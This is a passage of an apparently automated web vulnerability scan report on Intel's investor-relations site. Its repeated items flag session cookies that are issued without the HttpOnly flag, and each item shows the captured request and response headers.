Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:13:34 GMT;path=/
Vary: Accept-Encoding
Content-Length: 43016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.70. http://www.intc.com/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.cfm?iid=ftr+invrel HTTP/1.1
Host: www.intc.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:12:49 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NOMOBILE=0;path=/
Set-Cookie: INTC_SESSION=1158415365%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A48%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A48%27%7D%7CB98F31D77EB5BDC04B24EA248F8FA9B0;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:12:49 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7588889;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:12:49 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:12:49 GMT;path=/
Vary: Accept-Encoding
Content-Length: 37031


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.71. http://www.intc.com/investorkit.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /investorkit.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /investorkit.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A14%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:14 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:14 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:14 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.72. http://www.intc.com/investornews.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /investornews.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /investornews.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:16:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A07%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:08 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:08 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:08 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.73. http://www.intc.com/outlook.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /outlook.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /outlook.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A19%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:19 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:19 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:19 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.74. http://www.intc.com/priceList.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /priceList.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /priceList.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A07%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:07 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:07 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:07 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.75. http://www.intc.com/ratios.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /ratios.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ratios.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A20%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:20 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:20 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:20 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.76. http://www.intc.com/releasedetail.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /releasedetail.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /releasedetail.cfm?ReleaseID=546454&ReleasesType=Home&ReleasesType=Home HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A58%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:58 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:58 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:58 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.77. http://www.intc.com/results.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /results.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A20%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:21 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:21 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:21 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.78. http://www.intc.com/search.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /search.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A17%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:17 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:17 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.79. http://www.intc.com/sec.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /sec.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sec.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:16:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A16%3A37%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:37 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:16:37 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:16:37 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.80. http://www.intc.com/shareServices.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /shareServices.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /shareServices.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:15:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A15%3A07%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:08 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:15:08 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:15:08 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.81. http://www.intc.com/stock.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /stock.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /stock.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:50 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:50 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.82. http://www.intc.com/ticktock.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /ticktock.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ticktock.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A57%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:57 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:57 GMT;path=/
Set-Cookie: INTC_PREVIEW=;expires=Fri, 05-Feb-2010 23:14:57 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...

12.83. http://www.intc.com/videoDetail.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.intc.com
Path:   /videoDetail.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videoDetail.cfm HTTP/1.1
Host: www.intc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 23:14:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A56%27%7D%7C1D065BF6CBF3E92923967C8F41218506;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:56 GMT;path=/
Set-Cookie: INTC_BRIEFCASE=UPDATED%7C40489%2E7589005;domain=www.intc.com;expires=Sun, 05-Feb-2012 23:14:56 GMT;path=/
